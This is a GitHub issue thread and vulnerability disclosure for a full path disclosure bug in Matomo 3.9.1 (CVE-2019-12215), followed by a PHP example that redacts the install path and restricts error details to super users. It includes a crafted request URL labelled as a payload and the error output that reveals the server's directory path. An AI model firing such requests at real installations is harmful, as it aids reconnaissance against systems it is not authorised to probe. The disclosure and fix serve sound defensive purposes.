Full Path Disclosure #14464
Comments
Hi, On my Matomo instance this only shows the generic |
I can confirm this problem, but it only works if the user has at least view access to the site. No custom PHP settings are in place. |
No custom settings here and yeah it requires authentication I did state that :) |
This is the code that displays this additional error information: matomo/plugins/CorePluginsAdmin/templates/safemode.twig Lines 35 to 63 in 17ca84d
So @Findus23 I would guess, you tried as anonymous user? The easy fix would be probably to remove the basepath from |
Not sure what I did wrong before, but now I can get the same safemode page. But I doubt that showing the full backtrace to superusers isn't that much of a security issue and helps greatly with debugging. I'm not sure what is causing the exception itself as I can also reproduce it with |
The problem is, that this page gets displayed for all users because the |
Hi, @fdellwing has a great point, @Findus23 can you confirm this is a vulnerability please? |
The issue causing that message to appear at all was fixed in #14023. If you have any other URLs that are throwing any kind of unexpected error, feel free to create issues for those errors (not any containing path disclosures).
A full path disclosure vulnerability was discovered in Matomo (v3.9.1) where a user can trigger a particular error to discover the full path of Matomo on the disk.
PAYLOAD:
http://example.com/index.php?date=2019-04-20%2C2019-05-19&forceView=1&viewDataTable=test&module=API&action=get&widget=1&disableLink=0&idSite=1&period=day&columns=nb_outlinks%2Cnb_uniq_outlinks&colors={%22backgroundColor%22%3A%22%23ffffff%22%2C%22lineColor%22%3A%22%23162c4a%22%2C%22minPointColor%22%3A%22%23ff7f7f%22%2C%22maxPointColor%22%3A%22%2375bf7c%22%2C%22lastPointColor%22%3A%22%2355aaff%22%2C%22fillColor%22%3A%22%23ffffff%22
RESULT:
Neither the property "getRows" nor one of the methods "getRows()", "getgetRows()"/"isgetRows()" or "__call()" exist and have public access in class "Piwik\DataTable\Map".
in /var/www/html/mato/piwik/plugins/CoreVisualizations/templates/_dataTableViz_htmlTable.twig line 21
Discovered by Gionathan Armando Reale
CVE-2019-12215
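The two mitigations raised in the thread (strip the install base path from the rendered error, and only show error details to super users rather than to everyone with view access) can be combined in one small render step. The following is an added illustration, not Matomo's own code: the function names `redactBasePath` and `renderErrorForUser`, the placeholder `<install-dir>` and the sample path `/var/www/html/example` are all assumptions, and the sample message is constructed to resemble the report's output.

```php
<?php
// Added example (not Matomo's code). Names here are hypothetical.

/**
 * Replace every occurrence of the absolute install directory in $message with a
 * neutral placeholder, so a rendered exception such as
 * "... in /var/www/html/example/plugins/.../foo.twig line 21" no longer reveals
 * where the application lives on disk.
 */
function redactBasePath(string $message, string $basePath): string
{
    // Normalise the base path so both "/var/www/html/example" and
    // "/var/www/html/example/" are matched, and refuse to replace an empty string.
    $basePath = rtrim($basePath, '/');
    if ($basePath === '') {
        return $message;
    }
    return str_replace($basePath, '<install-dir>', $message);
}

/**
 * Decide what the error page may show for the current user.
 * Anonymous and regular (view-access) users only get a generic message;
 * super users get the details, but with the install path already redacted.
 */
function renderErrorForUser(string $rawMessage, string $basePath, bool $isSuperUser): string
{
    if (!$isSuperUser) {
        return 'An unexpected error occurred. Please contact your administrator.';
    }
    return redactBasePath($rawMessage, $basePath);
}

// Constructed sample modelled on the report's error output; the path is not real.
$raw = 'Neither the property "getRows" nor one of the methods "getRows()" exist '
     . 'and have public access in class "Piwik\DataTable\Map". '
     . 'in /var/www/html/example/plugins/CoreVisualizations/templates/_dataTableViz_htmlTable.twig line 21';

// View-access user: generic message only.
echo renderErrorForUser($raw, '/var/www/html/example', false), PHP_EOL;

// Super user: details are shown, but the absolute path is replaced by the placeholder.
echo renderErrorForUser($raw, '/var/www/html/example', true), PHP_EOL;
```

The redaction runs on the message string rather than on the exception's file property alone, because the thread shows the path surfacing inside the Twig error text itself; redacting the whole message catches that case too. The super-user gate is the more important of the two controls, since it addresses the thread's point that the safemode page was being shown to any authenticated user with view access.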